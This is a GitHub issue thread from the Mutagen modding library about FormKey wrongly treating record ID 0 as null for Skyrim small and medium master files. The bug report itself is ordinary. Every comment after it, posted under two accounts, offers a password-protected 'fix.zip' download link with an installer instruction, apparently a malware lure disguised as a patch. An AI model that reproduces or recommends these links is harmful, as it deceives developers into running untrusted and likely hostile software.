### ISSUE TITLE
IDs of 0 on Small/Medium master files

### ISSUE THREAD

**Issue by Noggog** [Mutagen-Modding/Mutagen#546]
for example: https://www.nexusmods.com/skyrimspecialedition/mods/124431

Has a record with `000000:A Conversation - Quest Mod.esp`

https://old.reddit.com/r/skyrimmods/comments/18btob5/updated_information_about_the_new_skyrim_update/

----------------

Main issue is that FormKey has this logic:
`public bool IsNull => ID == 0 || ModKey.IsNull;`

To fix this, we'd need to remove the `ID` check, hich means potentially null things might no longer be considered null.  Not sure if that'll cause issues offhand

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
